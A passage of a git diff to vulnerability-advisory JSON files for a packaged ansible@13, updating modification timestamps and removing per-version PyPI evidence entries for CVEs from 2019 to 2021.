+2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2019-14858", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-h653-95qw-h2mp", "CVE-2019-14858", @@ -40,13 +40,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "ansible", - "subject_version": "13.8.0", - "key": "pkg:pypi/ansible@13.8.0" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2019-14864.json b/advisories/BREW-ansible@13-CVE-2019-14864.json index 144d811a6d..1f0b011646 100644 --- a/advisories/BREW-ansible@13-CVE-2019-14864.json +++ b/advisories/BREW-ansible@13-CVE-2019-14864.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2019-14864", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-3m93-m4q6-mc6v", "CVE-2019-14864", @@ -40,13 +40,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "ansible", - "subject_version": "13.8.0", - "key": "pkg:pypi/ansible@13.8.0" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2019-14904.json b/advisories/BREW-ansible@13-CVE-2019-14904.json index bcc83e0b8b..e2d13da1ab 100644 --- a/advisories/BREW-ansible@13-CVE-2019-14904.json +++ b/advisories/BREW-ansible@13-CVE-2019-14904.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2019-14904", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-gwr8-5j83-483c", "CVE-2019-14904", @@ -40,13 +40,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "ansible", - "subject_version": "13.8.0", - "key": "pkg:pypi/ansible@13.8.0" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2019-14905.json b/advisories/BREW-ansible@13-CVE-2019-14905.json index 9f682dc497..c8cc364194 100644 --- a/advisories/BREW-ansible@13-CVE-2019-14905.json +++ b/advisories/BREW-ansible@13-CVE-2019-14905.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2019-14905", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-frxj-5j27-f8rf", "CVE-2019-14905", @@ -40,13 +40,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "ansible", - "subject_version": "13.8.0", - "key": "pkg:pypi/ansible@13.8.0" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2019-18874.json b/advisories/BREW-ansible@13-CVE-2019-18874.json index 5f6cc3a153..4f5e6fb345 100644 --- a/advisories/BREW-ansible@13-CVE-2019-18874.json +++ b/advisories/BREW-ansible@13-CVE-2019-18874.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2019-18874", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-qfc5-mcwq-26q8", "CVE-2019-18874", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "psutil", - "subject_version": "7.2.2", - "key": "pkg:pypi/psutil@7.2.2", - "resource": "psutil" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2019-20477.json b/advisories/BREW-ansible@13-CVE-2019-20477.json index 8491abfb24..055f5ad820 100644 --- a/advisories/BREW-ansible@13-CVE-2019-20477.json +++ b/advisories/BREW-ansible@13-CVE-2019-20477.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2019-20477", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-3pqx-4fqf-j49f", "CVE-2019-20477", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyyaml", - "subject_version": "6.0.3", - "key": "pkg:pypi/pyyaml@6.0.3", - "resource": "pyyaml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2019-3828.json b/advisories/BREW-ansible@13-CVE-2019-3828.json index 9f0ecf948b..53aa5b1ec1 100644 --- a/advisories/BREW-ansible@13-CVE-2019-3828.json +++ b/advisories/BREW-ansible@13-CVE-2019-3828.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2019-3828", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-74vq-h4q8-x6jv", "CVE-2019-3828", @@ -40,13 +40,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "ansible", - "subject_version": "13.8.0", - "key": "pkg:pypi/ansible@13.8.0" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2020-10684.json b/advisories/BREW-ansible@13-CVE-2020-10684.json index 3d537a2151..b258c77778 100644 --- a/advisories/BREW-ansible@13-CVE-2020-10684.json +++ b/advisories/BREW-ansible@13-CVE-2020-10684.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2020-10684", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-p62g-jhg6-v3rq", "CVE-2020-10684", @@ -40,13 +40,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "ansible", - "subject_version": "13.8.0", - "key": "pkg:pypi/ansible@13.8.0" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2020-10685.json b/advisories/BREW-ansible@13-CVE-2020-10685.json index 695d00e459..fb9cdae234 100644 --- a/advisories/BREW-ansible@13-CVE-2020-10685.json +++ b/advisories/BREW-ansible@13-CVE-2020-10685.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2020-10685", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-77g3-3j5w-64w4", "CVE-2020-10685", @@ -40,13 +40,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "ansible", - "subject_version": "13.8.0", - "key": "pkg:pypi/ansible@13.8.0" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2020-10691.json b/advisories/BREW-ansible@13-CVE-2020-10691.json index 5ec80b4d9c..b14de23b46 100644 --- a/advisories/BREW-ansible@13-CVE-2020-10691.json +++ b/advisories/BREW-ansible@13-CVE-2020-10691.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2020-10691", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-3c67-gc48-983w", "CVE-2020-10691", @@ -40,13 +40,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "ansible", - "subject_version": "13.8.0", - "key": "pkg:pypi/ansible@13.8.0" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2020-10729.json b/advisories/BREW-ansible@13-CVE-2020-10729.json index 99fd2bd14c..a2f2fa6a11 100644 --- a/advisories/BREW-ansible@13-CVE-2020-10729.json +++ b/advisories/BREW-ansible@13-CVE-2020-10729.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2020-10729", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-r6h7-5pq2-j77h", "CVE-2020-10729", @@ -40,13 +40,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "ansible", - "subject_version": "13.8.0", - "key": "pkg:pypi/ansible@13.8.0" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2020-10744.json b/advisories/BREW-ansible@13-CVE-2020-10744.json index 712e52e328..151e8ac89b 100644 --- a/advisories/BREW-ansible@13-CVE-2020-10744.json +++ b/advisories/BREW-ansible@13-CVE-2020-10744.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2020-10744", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-vp9j-rghq-8jhh", "CVE-2020-10744", @@ -40,13 +40,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "ansible", - "subject_version": "13.8.0", - "key": "pkg:pypi/ansible@13.8.0" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2020-14330.json b/advisories/BREW-ansible@13-CVE-2020-14330.json index 04fc80f563..5b609c95af 100644 --- a/advisories/BREW-ansible@13-CVE-2020-14330.json +++ b/advisories/BREW-ansible@13-CVE-2020-14330.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2020-14330", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-785x-qw4v-6872", "CVE-2020-14330", @@ -40,13 +40,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "ansible", - "subject_version": "13.8.0", - "key": "pkg:pypi/ansible@13.8.0" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2020-14332.json b/advisories/BREW-ansible@13-CVE-2020-14332.json index a216d9e05b..ed5257c732 100644 --- a/advisories/BREW-ansible@13-CVE-2020-14332.json +++ b/advisories/BREW-ansible@13-CVE-2020-14332.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2020-14332", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-j667-c2hm-f2wp", "CVE-2020-14332", @@ -40,13 +40,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "ansible", - "subject_version": "13.8.0", - "key": "pkg:pypi/ansible@13.8.0" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2020-14343.json b/advisories/BREW-ansible@13-CVE-2020-14343.json index 9bede4ae34..1f9d05c6bb 100644 --- a/advisories/BREW-ansible@13-CVE-2020-14343.json +++ b/advisories/BREW-ansible@13-CVE-2020-14343.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2020-14343", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-8q59-q68h-6hv4", "CVE-2020-14343", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyyaml", - "subject_version": "6.0.3", - "key": "pkg:pypi/pyyaml@6.0.3", - "resource": "pyyaml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2020-14365.json b/advisories/BREW-ansible@13-CVE-2020-14365.json index cc07bc0c8d..3fac4e5978 100644 --- a/advisories/BREW-ansible@13-CVE-2020-14365.json +++ b/advisories/BREW-ansible@13-CVE-2020-14365.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2020-14365", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-m429-fhmv-c6q2", "CVE-2020-14365", @@ -40,13 +40,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "ansible", - "subject_version": "13.8.0", - "key": "pkg:pypi/ansible@13.8.0" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2020-1733.json b/advisories/BREW-ansible@13-CVE-2020-1733.json index 995071dfb2..3805deabcf 100644 --- a/advisories/BREW-ansible@13-CVE-2020-1733.json +++ b/advisories/BREW-ansible@13-CVE-2020-1733.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2020-1733", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-g4mq-6fp5-qwcf", "CVE-2020-1733", @@ -40,13 +40,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "ansible", - "subject_version": "13.8.0", - "key": "pkg:pypi/ansible@13.8.0" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2020-1734.json b/advisories/BREW-ansible@13-CVE-2020-1734.json index 34ee5c3b73..1b45a7c7ee 100644 --- a/advisories/BREW-ansible@13-CVE-2020-1734.json +++ b/advisories/BREW-ansible@13-CVE-2020-1734.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2020-1734", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-h39q-95q5-9jfp", "CVE-2020-1734", @@ -40,13 +40,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "ansible", - "subject_version": "13.8.0", - "key": "pkg:pypi/ansible@13.8.0" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2020-1735.json b/advisories/BREW-ansible@13-CVE-2020-1735.json index abc494d2c6..0e6d9ba7e1 100644 --- a/advisories/BREW-ansible@13-CVE-2020-1735.json +++ b/advisories/BREW-ansible@13-CVE-2020-1735.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2020-1735", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-gfr2-qpxh-qj9m", "CVE-2020-1735", @@ -40,13 +40,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "ansible", - "subject_version": "13.8.0", - "key": "pkg:pypi/ansible@13.8.0" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2020-1736.json b/advisories/BREW-ansible@13-CVE-2020-1736.json index f4bad6bb7e..501d3741a9 100644 --- a/advisories/BREW-ansible@13-CVE-2020-1736.json +++ b/advisories/BREW-ansible@13-CVE-2020-1736.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2020-1736", "published": "2026-08-13T16:35:22Z", - "modified": "2026-09-03T08:45:29Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-x7jh-595q-wq82", "CVE-2020-1736", @@ -39,13 +39,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "ansible", - "subject_version": "13.8.0", - "key": "pkg:pypi/ansible@13.8.0" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2020-1737.json b/advisories/BREW-ansible@13-CVE-2020-1737.json index e04ae04d4e..22c637fd5d 100644 --- a/advisories/BREW-ansible@13-CVE-2020-1737.json +++ b/advisories/BREW-ansible@13-CVE-2020-1737.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2020-1737", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-893h-35v4-mxqx", "CVE-2020-1737", @@ -40,13 +40,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "ansible", - "subject_version": "13.8.0", - "key": "pkg:pypi/ansible@13.8.0" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2020-1738.json b/advisories/BREW-ansible@13-CVE-2020-1738.json index b0fede7b46..9248324fc5 100644 --- a/advisories/BREW-ansible@13-CVE-2020-1738.json +++ b/advisories/BREW-ansible@13-CVE-2020-1738.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2020-1738", "published": "2026-08-13T16:35:22Z", - "modified": "2026-09-03T08:45:29Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-f85h-23mf-2fwh", "CVE-2020-1738", @@ -39,13 +39,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "ansible", - "subject_version": "13.8.0", - "key": "pkg:pypi/ansible@13.8.0" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2020-1739.json b/advisories/BREW-ansible@13-CVE-2020-1739.json index 8fd344018d..b1eee78986 100644 --- a/advisories/BREW-ansible@13-CVE-2020-1739.json +++ b/advisories/BREW-ansible@13-CVE-2020-1739.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2020-1739", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-923p-fr2c-g5m2", "CVE-2020-1739", @@ -40,13 +40,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "ansible", - "subject_version": "13.8.0", - "key": "pkg:pypi/ansible@13.8.0" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2020-1740.json b/advisories/BREW-ansible@13-CVE-2020-1740.json index e088ac6f43..acbce3dcda 100644 --- a/advisories/BREW-ansible@13-CVE-2020-1740.json +++ b/advisories/BREW-ansible@13-CVE-2020-1740.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2020-1740", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-vcg8-98q8-g7mj", "CVE-2020-1740", @@ -40,13 +40,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "ansible", - "subject_version": "13.8.0", - "key": "pkg:pypi/ansible@13.8.0" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2020-1746.json b/advisories/BREW-ansible@13-CVE-2020-1746.json index 31e30b12d7..d3c077674f 100644 --- a/advisories/BREW-ansible@13-CVE-2020-1746.json +++ b/advisories/BREW-ansible@13-CVE-2020-1746.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2020-1746", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-j2h6-73x8-22c4", "CVE-2020-1746", @@ -40,13 +40,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "ansible", - "subject_version": "13.8.0", - "key": "pkg:pypi/ansible@13.8.0" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2020-1747.json b/advisories/BREW-ansible@13-CVE-2020-1747.json index 2e23c32142..244246f89d 100644 --- a/advisories/BREW-ansible@13-CVE-2020-1747.json +++ b/advisories/BREW-ansible@13-CVE-2020-1747.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2020-1747", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-6757-jp84-gxfx", "CVE-2020-1747", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyyaml", - "subject_version": "6.0.3", - "key": "pkg:pypi/pyyaml@6.0.3", - "resource": "pyyaml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2020-1753.json b/advisories/BREW-ansible@13-CVE-2020-1753.json index 192baf7a17..f69a3aeeb8 100644 --- a/advisories/BREW-ansible@13-CVE-2020-1753.json +++ b/advisories/BREW-ansible@13-CVE-2020-1753.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2020-1753", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-86hp-cj9j-33vv", "CVE-2020-1753", @@ -40,13 +40,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "ansible", - "subject_version": "13.8.0", - "key": "pkg:pypi/ansible@13.8.0" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2020-25635.json b/advisories/BREW-ansible@13-CVE-2020-25635.json index 3c03def481..edff6b2fbe 100644 --- a/advisories/BREW-ansible@13-CVE-2020-25635.json +++ b/advisories/BREW-ansible@13-CVE-2020-25635.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2020-25635", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-f556-49jc-4rvc", "CVE-2020-25635", @@ -40,13 +40,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "ansible", - "subject_version": "13.8.0", - "key": "pkg:pypi/ansible@13.8.0" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2020-26137.json b/advisories/BREW-ansible@13-CVE-2020-26137.json index 598c02a813..f18cd0c5d1 100644 --- a/advisories/BREW-ansible@13-CVE-2020-26137.json +++ b/advisories/BREW-ansible@13-CVE-2020-26137.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2020-26137", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-wqvq-5m8c-6g24", "CVE-2020-26137", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2020-27783.json b/advisories/BREW-ansible@13-CVE-2020-27783.json index e1c5755f95..710166e4f3 100644 --- a/advisories/BREW-ansible@13-CVE-2020-27783.json +++ b/advisories/BREW-ansible@13-CVE-2020-27783.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2020-27783", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-pgww-xf46-h92r", "CVE-2020-27783", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "lxml", - "subject_version": "6.1.1", - "key": "pkg:pypi/lxml@6.1.1", - "resource": "lxml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2020-28493.json b/advisories/BREW-ansible@13-CVE-2020-28493.json index 59e74b0975..970a0c59d8 100644 --- a/advisories/BREW-ansible@13-CVE-2020-28493.json +++ b/advisories/BREW-ansible@13-CVE-2020-28493.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2020-28493", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-g3rq-g295-4j3m", "CVE-2020-28493", @@ -43,14 +43,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "jinja2", - "subject_version": "3.1.6", - "key": "pkg:pypi/jinja2@3.1.6", - "resource": "jinja2" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2020-7212.json b/advisories/BREW-ansible@13-CVE-2020-7212.json index 16c60332e5..44a416eebb 100644 --- a/advisories/BREW-ansible@13-CVE-2020-7212.json +++ b/advisories/BREW-ansible@13-CVE-2020-7212.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2020-7212", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-hmv2-79q8-fv6g", "CVE-2020-7212", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2021-20178.json b/advisories/BREW-ansible@13-CVE-2021-20178.json index fa0dd1ac6e..48469ee2af 100644 --- a/advisories/BREW-ansible@13-CVE-2021-20178.json +++ b/advisories/BREW-ansible@13-CVE-2021-20178.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2021-20178", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-wv5p-gmmv-wh9v", "CVE-2021-20178", @@ -40,13 +40,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "ansible", - "subject_version": "13.8.0", - "key": "pkg:pypi/ansible@13.8.0" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2021-20180.json b/advisories/BREW-ansible@13-CVE-2021-20180.json index e17574a750..56dc6da2c6 100644 --- a/advisories/BREW-ansible@13-CVE-2021-20180.json +++ b/advisories/BREW-ansible@13-CVE-2021-20180.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2021-20180", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-fh5v-5f35-2rv2", "CVE-2021-20180", @@ -40,13 +40,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "ansible", - "subject_version": "13.8.0", - "key": "pkg:pypi/ansible@13.8.0" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2021-20191.json b/advisories/BREW-ansible@13-CVE-2021-20191.json index 91a8c0a991..a7a6e5f8d5 100644 --- a/advisories/BREW-ansible@13-CVE-2021-20191.json +++ b/advisories/BREW-ansible@13-CVE-2021-20191.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2021-20191", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-8f4m-hccc-8qph", "CVE-2021-20191", @@ -40,13 +40,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "ansible", - "subject_version": "13.8.0", - "key": 